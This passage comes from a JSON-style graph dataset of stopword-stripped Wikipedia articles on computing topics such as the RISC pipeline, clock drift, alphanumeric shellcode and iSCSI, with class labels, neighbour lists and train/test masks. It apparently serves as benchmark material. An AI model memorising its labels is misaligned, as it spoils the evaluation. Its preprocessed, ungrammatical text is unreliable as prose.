decode stages send second instruction one cycle first flow pipeline shown diagram naive pipeline without hazard consideration data hazard progresses follows cycle 3 codice_1 instruction calculates new value codice_2 cycle codice_3 operation decoded value codice_2 fetched register file however codice_1 instruction yet written result codice_2 write-back normally occurs cycle 5 green box therefore value read register file passed alu execute stage codice_3 operation red box incorrect instead must pass data computed codice_1 back execute stage i.e red circle diagram codice_3 operation normally written-back solution problem pair bypass multiplexers multiplexers sit end decode stage flopped outputs inputs alu multiplexer selects decode stage logic compares registers written instructions execute access stages pipeline registers read instruction decode stage cause multiplexers select recent data bypass multiplexers make possible pipeline execute simple instructions latency alu multiplexer flip-flop without multiplexers latency writing reading register file would included latency instructions note data passed forward time data bypassed back earlier stage processed yet case data passed forward time codice_3 ready register alu codice_1 already computed however consider following instructions data read address codice_13 n't present data cache memory access stage codice_14 instruction time codice_3 instruction already alu resolve would require data memory passed backwards time input alu possible solution delay codice_3 instruction one cycle data hazard detected decode stage fetch decode stages stalled prevented flopping inputs stay state cycle execute access write-back stages downstream see extra no-operation instruction nop inserted codice_14 codice_3 instructions nop termed pipeline bubble since floats pipeline like air bubble occupying resources producing useful results hardware detect data hazard stall pipeline hazard cleared called pipeline interlock pipeline interlock used data forwarding however first example codice_1 followed codice_3 second example codice_14 followed codice_3 solved stalling first stage three cycles write-back achieved data register file correct causing correct register value fetched codice_3 decode stage causes quite performance hit processor spends lot time processing nothing clock speeds increased less forwarding logic wait data hazard detected quite easily program machine code written compiler stanford mips machine relied compiler add nop instructions case rather circuitry detect taxingly stall first two pipeline stages hence name mips microprocessor without interlocked pipeline stages turned extra nop instructions added compiler expanded program binaries enough instruction cache hit rate reduced stall hardware although expensive put back later designs improve instruction cache hit rate point acronym longer made sense control hazards caused conditional unconditional branching classic risc pipeline resolves branches decode stage means branch resolution recurrence two cycles long three implications four schemes solve performance problem branches delayed branches controversial first semantics complicated delayed branch specifies jump new location happens next instruction next instruction one unavoidably loaded instruction cache branch delayed branches criticized poor short-term choice isa design suppose 32-bit risc processes add instruction adds two large numbers result fit 32 bits happens simplest solution provided architectures wrapping arithmetic numbers greater maximum possible encoded value significant bits chopped fit usual integer number system 3000000000+3000000000=6000000000 unsigned 32 bit wrapping arithmetic 3000000000+3000000000=1705032704 6000000000 mod 2^32 may seem terribly useful largest benefit wrapping arithmetic every operation well defined result programmer especially programming language supporting large integers e.g lisp scheme may want wrapping arithmetic architectures e.g mips define special addition operations branch special locations overflow rather wrapping result software target location responsible fixing problem special branch called exception exceptions differ regular branches target address specified instruction branch decision dependent outcome instruction common kind software-visible exception one classic risc machines tlb miss see virtual memory exceptions different branches jumps control flow changes resolved decode stage exceptions resolved writeback stage exception detected following instructions earlier pipeline marked invalid flow end pipe results discarded program counter set address special exception handler special registers written exception location cause make easy fast software fix problem restart program cpu must take precise exception precise exception means instructions excepting instruction executed excepting instruction everything afterwards executed take precise exceptions cpu must commit changes software visible state program order in-order commit happens naturally classic risc pipeline instructions write results register file writeback stage writes automatically happen program order store instructions however write results store data queue access stage store instruction takes exception store data queue entry invalidated written cache data sram later occasionally either data instruction cache n't contain required datum instruction cases cpu must suspend operation cache filled necessary data must resume execution problem filling cache required data potentially writing back memory evicted cache line specific pipeline organization discussed two strategies handle suspend/resume problem first global stall signal signal activated prevents instructions advancing pipeline generally gating clock flip-flops start stage disadvantage strategy large number flip flops global stall signal takes long time propagate since machine generally stall cycle identifies condition requiring stall stall signal becomes speed-limiting critical path another strategy handle suspend/resume reuse exception logic machine takes exception offending instruction instructions invalidated cache filled necessary data instruction caused cache miss restarts expedite data cache miss handling instruction restarted access cycle happens one cycle data cache filled",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      2071,
      5655,
      27,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      5237,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      8450,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      9003,
      3886,
      10548,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10083,
      6502,
      10603,
      8048,
      4465,
      10612,
      1399,
      7033,
      1402,
      3451,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      938,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7853,
    "label": 4,
    "text": "Clock_drift:clock drift clock drift refers several related phenomena clock run exactly rate reference clock time clock drifts apart gradually desynchronizes clock i.e crystal-based clocks used computers like clocks subject clock drift means count time different rates diverge phenomenon used instance computers build random number generators negative side clock drift exploited timing attacks everyday clocks wristwatches finite precision eventually require correction remain accurate rate drift depends clock quality sometimes stability power source ambient temperature subtle environmental variables thus clock different drift rates different occasions advanced clocks old mechanical clocks often kind speed trimmer one adjust speed clock thus correct clock drift instance pendulum clocks clock drift manipulated slightly changing length pendulum quartz oscillator less subject drift due manufacturing variances pendulum mechanical clock hence everyday quartz clocks adjustable drift correction atomic clocks precise nearly clock drift even earth rotation rate drift variation drift atomic clock due tidal acceleration effects principle behind atomic clock enabled scientists re-define si unit second terms exactly 9 192 631 770 oscillations caesium atom precision oscillations allows atomic clocks drift roughly one second hundred million years 2015 accurate atomic clock loses one second every 15 billion years international atomic time tai time standard derivatives coordinated universal time utc based weighted averages atomic clocks worldwide einstein predicted relativistic effects also cause clock drift due time dilation fixed universal time time relative observer special relativity describes two clocks held observers different inertial frames i.e moving respect accelerating decelerating appear either observer tick different rates addition general relativity gives us gravitational time dilation briefly clock stronger gravitational field e.g closer planet appear tick slowly people holding clocks i.e inside outside stronger field would agree clocks appear going faster note time rather function clock affected effects experimentally observed time dilation practical importance instance clocks gps satellites experience effect due reduced gravity experience making clocks appear run quickly earth must therefore incorporate relativistically corrected calculations reporting locations users general relativity accounted navigational fix based gps satellites would false 2 minutes errors global positions would continue accumulate rate 10 kilometers day computer programs often need high quality random numbers especially cryptography several similar ways clock drift used build random number generators rngs one way build hardware random number generator use two independent clock crystals one instance ticks 100 times per second one ticks 1 million times per second average faster crystal tick 10,000 times time slower one ticks since clock crystals precise exact number ticks vary variation used create random bits instance number fast ticks even 0 chosen number ticks odd 1 chosen thus 100/1000000 rng circuit produce 100 somewhat random bits per second typically system biased—it might instance produce zeros ones—and hundreds somewhat-random bits whitened produce unbiased bits also similar way build kind software random number generator involves comparing timer tick operating system tick usually 100–1000 times per second speed cpu os timer cpu run two independent clock crystals situation ideal less previous example even use clock crystal process/program clock drift measurement disturbed many less unpredictable events cpu interrupts processes programs runs time thus measurement still produce fairly good random numbers hardware random number generators ones described fairly slow therefore programs use create good seed feed pseudorandom number generator cryptographically secure pseudorandom number generator produce many random numbers fast 2006 side channel attack published exploited clock skew based cpu heating attacker causes heavy cpu load pseudonymous server tor hidden service causing cpu heating cpu heating correlated clock skew detected observing timestamps server real identity",
    "neighbors": [
      4389,
      4423,
      1776,
      5457,
      8273,
      3637
    ],
    "mask": "Test"
  },
  {
    "node_id": 7854,
    "label": 3,
    "text": "SolydXK:solydxk solydxk dutch linux distribution based debian aims simple use providing environment stable secure ideal small businesses non-profit organizations home users solydxk includes proprietary software adobe flash steam optional closed-source drivers provide initial multimedia usage gaming linux solydxk originated 2012 unofficial version linux mint debian edition lmde using kde plasma 4 workspaces november 2012 linux mint ceased maintaining kde xfce versions lmde solydxk started support two desktop environments solydx refers xfce version solydk refers kde version project name amalgam two names two core editions solydxk solydx solydk officially available 64-bit live cds installers distribution installs common software firefox libreoffice xchat/quassel pidgin/kopete gimp variety common tasks editions also provide steam playonlinux installed gaming driver manager easily enable best gaming performance solydxk originally based debian testing since january 2015 built debian stable also community editions officially tested supported solydxk team examples solydxk enthusiast ’ edition versions solydx solydk follow debian testing 32-bit community editions version raspberry pi 3",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      3649,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      1849,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      5078,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      499,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 7855,
    "label": 4,
    "text": "Payload_(computing):payload computing computing telecommunications payload part transmitted data actual intended message headers metadata sent enable payload delivery context computer virus worm payload portion malware performs malicious action term borrowed transportation payload refers part load pays transportation computer security payload part private user text could also contain malware worms viruses performs malicious action deleting data sending spam encrypting data addition payload malware also typically overhead code aimed simply spreading avoiding detection computer programming common usage term context message protocols differentiate protocol overhead actual data example json web service response might string hello world payload rest protocol overhead computer networking data transmitted payload almost always encapsulated type frame composed framing bits frame check sequence examples ethernet frames point-to-point protocol ppp frames fibre channel frames v.42 modem frames",
    "neighbors": [
      5636,
      10756,
      535,
      2084,
      7717,
      3629,
      7739,
      8252,
      9791,
      8265,
      4703,
      9834,
      107,
      5245,
      5246,
      9356,
      9868,
      10392,
      9375,
      2213,
      3262,
      10947,
      7368,
      5325,
      2262,
      6360,
      3290,
      2275,
      6373,
      8432,
      10492,
      5373,
      9488,
      8978,
      5402,
      4892,
      5404,
      8989,
      10020,
      8998,
      3887,
      5433,
      6992,
      4435,
      7515,
      4956,
      5470,
      2912,
      5472,
      8032,
      1381,
      3941,
      361,
      8045,
      899,
      9607,
      6541,
      11152,
      3473,
      7570,
      1429,
      6550,
      2975,
      939,
      2989,
      9646,
      1970,
      6588,
      1474,
      3525,
      9160,
      5071,
      4561,
      8664,
      9688,
      5096,
      11244,
      4589,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7856,
    "label": 4,
    "text": "Alphanumeric_shellcode:alphanumeric shellcode computer security alphanumeric shellcode shellcode consists assembles execution entirely alphanumeric ascii unicode characters 0-9 a-z a-z type encoding created hackers hide working machine code inside appears text useful avoid detection code allow code pass filters scrub non-alphanumeric characters strings part filters response non-alphanumeric shellcode exploits similar type encoding called printable code uses printable characters 0-9 a-z a-z etc ... shown possible create shellcode looks like normal text english writing alphanumeric printable code requires good understanding instruction set architecture machine code executed demonstrated possible write alphanumeric code executable one machine",
    "neighbors": [
      7717,
      37,
      5358,
      4956,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7857,
    "label": 2,
    "text": "Comparison_of_mobile_operating_systems:comparison mobile operating systems comparison mobile operating systems latest versions shown table even though older versions may still marketed",
    "neighbors": [
      11271,
      5647,
      3089,
      10271,
      3626,
      3629,
      5677,
      7727,
      1074,
      9784,
      1083,
      2111,
      7246,
      3152,
      7253,
      3162,
      10332,
      607,
      97,
      2658,
      10341,
      6763,
      4725,
      8315,
      8316,
      8829,
      7292,
      11391,
      6276,
      10886,
      9863,
      6797,
      10387,
      10900,
      1177,
      10393,
      6301,
      673,
      3248,
      2228,
      2235,
      7869,
      5824,
      6344,
      4305,
      2259,
      9434,
      8413,
      4318,
      5857,
      4326,
      1255,
      8423,
      10470,
      5356,
      9964,
      7920,
      5369,
      771,
      4364,
      5406,
      4383,
      2852,
      2345,
      4399,
      823,
      7991,
      7492,
      11079,
      2892,
      2383,
      8019,
      2399,
      10080,
      3940,
      9063,
      10599,
      6508,
      2925,
      3949,
      7556,
      3462,
      6539,
      1435,
      10658,
      4011,
      11184,
      7118,
      2001,
      3542,
      4068,
      487,
      10215,
      3561,
      495,
      499,
      1524,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 7858,
    "label": 3,
    "text": "Stack_register:stack register stack register computer central processor register whose purpose keep track call stack accumulator-based architecture machine may dedicated register sp intel x86 machine general register machine may register reserved convention pdp-11 risc machines designs data general eclipse dedicated register used reserved hardware memory address function machines late 1960s—such pdp-8 hp 2100—did compilers supported recursion subroutine instructions typically would save current location jump address set program counter next address simpler maintaining stack since one return location per subroutine code section recursion without considerable effort part programmer stack machine 2 stack registers — one keeps track call stack keep track stack 8086 main stack register called stack pointer sp stack segment register ss usually used store information memory segment stores call stack currently executed program sp points current stack top default stack grows downward memory newer values placed lower memory addresses push value stack codice_1 instruction used pop value stack codice_2 instruction used example assuming ss 1000h sp 0xf820 means current stack top physical address 0x1f820 due memory segmentation 8086 next two machine instructions program illustrates push works usually running program pushes registers stack make use registers purposes like call routine may change current values registers restore values stored stack program shall contain machine instructions like note program pops bx first pushed last note 8086 codice_1 codice_2 instructions work 16-bit elements simpler processors store stack pointer regular hardware register use arithmetic logic unit alu manipulate value typically push pop translated multiple micro-ops separately add/subtract stack pointer perform load/store memory newer processors contain dedicated stack engine optimize stack operations pentium first x86 processor introduce stack engine implementation stack pointer split among two registers esp 32-bit register esp 8-bit delta value updated directly stack operations push pop call ret opcodes operate directly esp register esp near overflow esp register referenced instructions esp ≠ 0 synchronisation micro-op inserted updates esp using alu resets esp 0 design remained largely unmodified later intel processors although esp expanded 64 bits stack engine similar intel also adopted amd k8 microarchitecture bulldozer need synchronization micro-ops removed internal design stack engine known",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      8732,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      8322,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      5380,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      7963,
      4385,
      2339,
      6950,
      11050,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      9599,
      3457,
      9092,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      5040,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7859,
    "label": 5,
    "text": "LogMeIn_Hamachi:logmein hamachi logmein hamachi virtual private network vpn application written alex pankratov 2004 capable establishing direct links computers behind network address translation nat firewalls without requiring reconfiguration user pc accessed directly without relays internet/wan side words establishes connection internet emulates connection would exist computers connected local area network lan hamachi acquired pankratov logmein 2009 currently available production version microsoft windows macos beta version linux system-vpn-based client compatible android ios paid subscribers hamachi runs background idle computers feature previously available users became restricted paid subscribers hamachi proprietary centrally-managed vpn system consisting server cluster managed vendor system client software installed end-user computers client software adds virtual network interface computer used intercepting outbound well injecting inbound vpn traffic outbound traffic sent operating system interface delivered client software encrypts authenticates sends destination vpn peer specially initiated udp connection hamachi currently handles tunneling ip traffic including broadcasts multicast windows version also recognizes tunnels ipx traffic client establishes maintains control connection server cluster connection established client goes login sequence followed discovery process state synchronization login step authenticates client server vice versa discovery used determine topology client internet connection specifically detect presence nat firewall devices route internet synchronization step brings client view private networks sync members networks member network goes online offline server instructs network peers either establish tear tunnels former establishing tunnels peers hamachi uses server-assisted nat traversal technique similar udp hole punching detailed information works made public process work certain combinations nat devices requiring user explicitly set port forward additionally 1.0 series client software capable relaying traffic vendor-maintained 'relay servers event unexpectedly losing connection server client retains tunnels starts actively checking status server unexpectedly loses client connection informs client peers fact expects also start liveliness checks enables hamachi tunnels withstand transient network problems route client server well short periods complete server unavailability hamachi clients also get closed port clients repaired port forwarding hamachi frequently used gaming remote administration vendor provides free basic service extra features fee february 2007 ip-level block imposed hamachi servers parts vietnamese internet space due scale system abuse originating blocked addresses company working less intrusive solution problem hamachi client normally assigned ip address logs system first time avoid conflicting existing private networks client side normal private ip address blocks 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 used november 19 2012 5.0.0.0/8 range used range previously unallocated allocated ripe ncc late 2010 space range used hosting providers public internet hamachi switched 25.0.0.0/8 block 25.0.0.0/8 block allocated british ministry defence organisations need communicate mod may experience problems specific internet routes attract traffic meant internal hosts alternatively find unable reach legitimate users addresses addresses used internally squatting established practice internet client supports ipv6 selected address assigned picked range registered logmein ip address assigned hamachi client henceforth associated client public crypto key long client retains key log system use ip address hamachi creates single broadcast domain clients makes possible use lan protocols rely ip broadcasts discovery announcement services hamachi networks following considerations apply hamachi use vpn application current builds hamachi available following operating systems prior versions 1.0.2.0 1.0.2.1 windows release many windows vista users experienced compatibility connection issues using hamachi march 30 2007 software includes vista tweaks answer os-related problems among specific solutions",
    "neighbors": [
      2050,
      10631,
      10889,
      4746,
      8331,
      9868,
      6797,
      14,
      9722,
      8211,
      11413,
      11162,
      3742,
      9764,
      4268,
      7214,
      7983,
      10417,
      2228,
      823,
      3770,
      5819,
      8640,
      3777,
      9281,
      2884,
      5959,
      8265,
      11468,
      7502,
      3792,
      6993,
      7376,
      11606,
      2136,
      9048,
      6490,
      8283,
      5084,
      6364,
      5470,
      5472,
      10210,
      7139,
      9318,
      8039,
      11248,
      5749,
      3322
    ],
    "mask": "Train"
  },
  {
    "node_id": 7860,
    "label": 4,
    "text": "FlowMon:flowmon flowmon name monitoring probe result academic research activity cesnet also name commercial product marketed university spin-off company flowmon networks flowmon probe appliance monitoring reporting information ip flows high-speed computer networks probe developed liberouter team within scope cesnet research plan optical national research network new applications research activity 602 programmable hardware flowmon probe built upon pair programmable network cards called combo host computer linux operating system pair combo cards consists main card pci pci-x pci-express connector connection motherboard host computer add-on card 2 4 network interfaces cards contain programmable chips fpgas able process high amount data multi-gigabit speed flow monitoring process split hardware acceleration cards application software running host computer following principle hardware/software codesign time-critical tasks implemented fpga chips acceleration cards complex operations carried application software concept enables monitoring modern high-speed 1 gbps 10 gbps networks packet loss necessity input sampling time flexible user-friendly interface provided software flowmon probe passive monitoring device i.e alter passing traffic way therefore detection hardly possible connected network flowmon probe observes passing traffic/packets extracts aggregates information ip flows flow records flowmon probe able export aggregated data external collectors netflow version 5 9 ipfix format collectors collect incoming flow records store automated manual visual analysis automated malicious traffic detection filter rules graphs statistical schemas whole system allows monitoring actual state monitored network well long-term traffic analysis flowmon probe part géant2 security toolset consists netflow analysis tools nfsen nfdump flowmon appliance flowmon network traffic monitoring security solution flowmon networks company flowmon networks established 2007 university spin-off made technology transfer cesnet czech nren continue r finish prototypes put market flowmon solution initially based flowmon probes developed cesnet nowadays flowmon complete flow monitoring solution consists flowmon probes flowmon collectors additional modules flowmon ads flowmon apm flowmon ddos defender flowmon traffic recorder flowmon probes provide netflow/ipfix statistics network traffic come standard version suitable standard networks 10mbit/s 10gbit/s hardware-accelerated version based cesnet fpga boards suitable high-speed networks 10gbit/s 100gbit/s flowmon collectors appliances netflow/sflow/ipfix/jflow/netflow lite/net stream/cflowd storage analysis flowmon modules extend functionality flowmon probes flowmon collectors brings additional functionality e.g network behavior analysis nba application performance monitoring anomaly detection http logging",
    "neighbors": [
      5559,
      8625,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7861,
    "label": 5,
    "text": "ChatZilla:chatzilla chatzilla irc client mozilla-based browsers firefox introduced 2000 cross-platform open source software noted consistent appearance across platforms css appearance customization scripting april 20 1999 reported mozilla time open-source arm aol netscape communications division announced commencement instant messaging chat project stated goal supporting wide variety chat protocols including venerable internet relay chat companies also developing chat systems recognize lot interest instant messaging space said aol spokesperson catherine corre referring mozilla project 'this recognition interest area time new chat client proposal reported competition aol aol instant messenger chat client april 21 1999 announcement rescinded pending review netscape independently programmer robert ginda developed irc client submitted mozilla project september 1999 planned introduce planned release mozilla browser named chatzilla client available development form may 2000 netscape 6.01 browser mozilla 0.8 chatzilla runs platform mozilla-based browser run including os x linux microsoft windows provides consistent user interface across board also used standalone app using xulrunner contains general features irc clients including connecting multiple servers maintaining built-in list standard networks searching sorting available channels chat logging direct client-to-client dcc chat file transfers user customization interface chatzilla includes automatic completion nicknames codice_1 key appends comma nickname first word line also provides completion codice_2 codice_1 key quick double-codice_1 presents list available commands based typed far text entry window single line enter key sends composed text multiline allows composing larger text sections line breaks ctrl-enter key combo sends text block javascript used running scripts messages styled css controlled user selecting view menu dragging link codice_5 file message window codice_6 command dcc supported allows users transfer files chat directly one another sender message shown left text link—clicking link opens private chat window user chatzilla included seamonkey addition available download mozilla-based browsers firefox extension also run tab firefox chatzilla offers many plugins extend functionality user-experience add-on plugins include introduction firefox quantum version 57 dropped support add-ons stopped chatzilla working inside firefox work begun move code webextension reviews chatzilla varied enthusiastic case users familiar irc unimpressed reviewers accustomed chat client user interfaces 2003 review computers doctors mozilla 1.0 referred irc client applications user-friendly goes chatzilla wo n't find pop-up icons happy little noises telling somebody wants chat 2004 jennifer golbeck writing irc hacks pointed cross-platform consistency found quick easy start using great support changing appearance chat windows motifs ... css files 2008 overview extensions firefox linux journal dan sawyer described chatzilla oldie-but-goodie venerable trimmings handsomely organizes chat channels logs extensive built-in list available channels supports dcc chats file transfers plugin theming architecture application implements standards well prefer keep desktop clutter minimum still enjoy fighting random strangers irc chatzilla must-have",
    "neighbors": [
      1664,
      5760,
      5251,
      3462,
      6791,
      9736,
      6797,
      1295,
      7951,
      2836,
      5397,
      10006,
      11418,
      9757,
      1713,
      823,
      11449,
      5054,
      9152,
      9281,
      5316,
      10057,
      2893,
      5199,
      7889,
      2387,
      3030,
      5078,
      6231,
      7384,
      8923,
      10078,
      482,
      10722,
      488,
      2409,
      8169,
      1643,
      5612,
      10860,
      2804,
      6133,
      7543,
      4728,
      5114,
      8443,
      637,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 7862,
    "label": 9,
    "text": "FusionDebug:fusiondebug fusiondebug interactive step debugger cfml compatible adobe coldfusion railo lucee enables developers step code line-by-line step code better understand code running",
    "neighbors": [
      4512,
      5314,
      8739,
      9666,
      102,
      1802,
      3469,
      655,
      7983,
      4529,
      9618,
      148,
      9144,
      3895,
      5048,
      4507
    ],
    "mask": "Test"
  },
  {
    "node_id": 7863,
    "label": 5,
    "text": "ISCSI:iscsi computing iscsi acronym internet small computer systems interface internet protocol ip -based storage networking standard linking data storage facilities provides block-level access storage devices carrying scsi commands tcp/ip network iscsi used facilitate data transfers intranets manage storage long distances used transmit data local area networks lans wide area networks wans internet enable location-independent data storage retrieval protocol allows clients called initiators send scsi commands cdbs storage devices targets remote servers storage area network san protocol allowing organizations consolidate storage storage arrays providing clients database web servers illusion locally attached scsi disks mainly competes fibre channel unlike traditional fibre channel usually requires dedicated cabling iscsi run long distances using existing network infrastructure iscsi pioneered ibm cisco 1998 submitted draft standard march 2000 essence iscsi allows two hosts negotiate exchange scsi commands using internet protocol ip networks iscsi takes popular high-performance local storage bus emulates wide range networks creating storage area network san unlike san protocols iscsi requires dedicated cabling run existing ip infrastructure result iscsi often seen low-cost alternative fibre channel requires dedicated infrastructure except fcoe fibre channel ethernet form however performance iscsi san deployment severely degraded operated dedicated network subnet lan vlan due competition fixed amount bandwidth although iscsi communicate arbitrary types scsi devices system administrators almost always use allow servers database servers access disk volumes storage arrays iscsi sans often one two objectives initiator functions iscsi client initiator typically serves purpose computer scsi bus adapter would except instead physically cabling scsi devices like hard drives tape changers iscsi initiator sends scsi commands ip network initiator falls two broad types software initiator uses code implement iscsi typically happens kernel-resident device driver uses existing network card nic network stack emulate scsi devices computer speaking iscsi protocol software initiators available popular operating systems common method deploying iscsi hardware initiator uses dedicated hardware typically combination firmware running hardware implement iscsi hardware initiator mitigates overhead iscsi tcp processing ethernet interrupts therefore may improve performance servers use iscsi iscsi host bus adapter commonly hba implements hardware initiator typical hba packaged combination gigabit 10 gigabit ethernet network interface controller kind tcp/ip offload engine toe technology scsi bus adapter appears operating system iscsi hba include pci option rom allow booting iscsi san iscsi offload engine isoe card offers alternative full iscsi hba isoe offloads iscsi initiator operations particular network interface host processor freeing cpu cycles main host applications iscsi hbas isoes used additional performance enhancement justifies additional expense using hba iscsi rather using software-based iscsi client initiator isoe may implemented additional services tcp offload engine toe reduce host server cpu usage iscsi specification refers storage resource located iscsi server generally one potentially many instances iscsi storage nodes running server target iscsi target often dedicated network-connected hard disk storage device may also general-purpose computer since initiators software provide iscsi target available mainstream operating systems common deployment scenarios iscsi target include data center enterprise environment iscsi target often resides large storage array arrays form commodity hardware free-software-based iscsi implementations commercial products quantastor cloudbyte stortrends pure storage hp storageworks equallogic tegile systems nimble storage reduxio ibm storwize family isilon netapp filer emc corporation ns-series cx4 vnx vnxe vmax hitachi data systems hnas pivot3 vstac storage array usually provides distinct iscsi targets numerous clients nearly modern mainstream server operating systems bsd linux solaris windows server provide iscsi target functionality either built-in feature supplemental software specific-purpose operating systems implement iscsi target support scsi terminology lun stands logical unit specified unique logical unit numbers lun represents individually addressable logical scsi device part physical scsi device target iscsi environment luns essentially numbered disk drives initiator negotiates target establish connectivity lun result iscsi connection emulates connection scsi hard disk initiators treat iscsi luns way would raw scsi ide hard drive instance rather mounting remote directories would done nfs cifs environments iscsi systems format directly manage filesystems iscsi luns enterprise deployments luns usually represent subsets large raid disk arrays often allocated one per client iscsi imposes rules restrictions multiple computers sharing individual luns leaves shared access single underlying filesystem task operating system general data storage already-booted computer type generic network interface may used access iscsi devices however generic consumer-grade network interface able boot diskless computer remote iscsi data source instead commonplace server load initial operating system tftp server local boot device use iscsi data storage booting local device finished separate dhcp server may configured assist interfaces equipped network boot capability able boot iscsi case network interface looks dhcp server offering pxe bootp boot image used kick iscsi remote boot process using booting network interface mac address direct computer correct iscsi boot target one use software-only approach load small boot program turn mount remote iscsi target local scsi drive fire boot process said iscsi target achieved using existing preboot execution environment pxe boot rom available many wired ethernet adapters boot code also loaded cd/dvd floppy disk floppy disk image usb storage replace existing pxe boot code adapters re-flashed popular free software offer iscsi boot support ipxe intel ethernet controllers servers support iscsi boot iscsi uses tcp typically tcp ports 860 3260 protocols higher-level names used address objects within protocol special names refer iscsi initiators targets iscsi provides three name-formats iqn format addresses occur commonly qualified date yyyy-mm domain names expire acquired another entity ieee registration authority provides eui accordance eui-64 standard naa part oui provided ieee registration authority naa name formats added iscsi rfc 3980 provide compatibility naming conventions used fibre channel serial attached scsi sas storage technologies usually iscsi participant defined three four fields iscsi initiators locate appropriate storage resources using internet storage name service isns protocol theory isns provides iscsi sans management model dedicated fibre channel sans practice administrators satisfy many deployment goals iscsi without using isns iscsi initiators targets prove identity using chap includes mechanism prevent cleartext passwords appearing wire chap vulnerable dictionary attacks spoofing reflection attacks followed carefully best practices using chap within iscsi reduce surface attacks mitigate risks additionally ip-based protocols ipsec operate network layer iscsi negotiation protocol designed accommodate authentication schemes though interoperability issues limit deployment ensure valid initiators connect storage arrays administrators commonly run iscsi logically isolated backchannel networks deployment architecture management ports storage arrays exposed general-purpose internal network iscsi protocol run dedicated network segments virtual lans vlan mitigates authentication concerns unauthorized users physically provisioned iscsi thus talk storage arrays however also creates transitive trust problem single compromised host iscsi disk used attack storage resources hosts iscsi logically isolated general network using vlans still different network equipment may use cable port long completed signal path source target single cabling mistake network technician compromise barrier logical separation accidental bridging may immediately detected cause network errors order differentiate iscsi regular network prevent cabling mistakes changing connections administrators may implement self-defined color-coding labeling standards using yellow-colored cables iscsi connections blue cables regular network clearly labeling ports switches used iscsi iscsi could implemented vlan cluster ports large multi-port switch also used general network usage administrator may instead choose use physically separate switches dedicated iscsi vlans prevent possibility incorrectly connected cable plugged wrong port bridging logical barrier iscsi aims consolidate storage many servers single storage array iscsi deployments require strategies prevent unrelated initiators accessing storage resources pathological example single enterprise storage array could hold data servers variously regulated sarbanes–oxley act corporate accounting hipaa health benefits information pci dss credit card processing audit storage systems must demonstrate controls ensure server one regime access storage assets server another typically iscsi storage arrays explicitly map initiators specific target luns initiator authenticates storage array specific storage asset intends use however target luns scsi commands expressed iscsi negotiation protocol underlying scsi protocol care must taken ensure access control provided consistently part iscsi operates cleartext protocol provides cryptographic protection data motion scsi transactions result attacker listen iscsi ethernet traffic problems occur iscsi rather apply san protocol without cryptographic security ip-based security protocols ipsec provide standards-based cryptographic protection traffic dates following table denote first appearance native driver operating system third-party drivers windows linux available early 2001 specifically attaching ibm ip storage 200i appliance iscsi targets involve 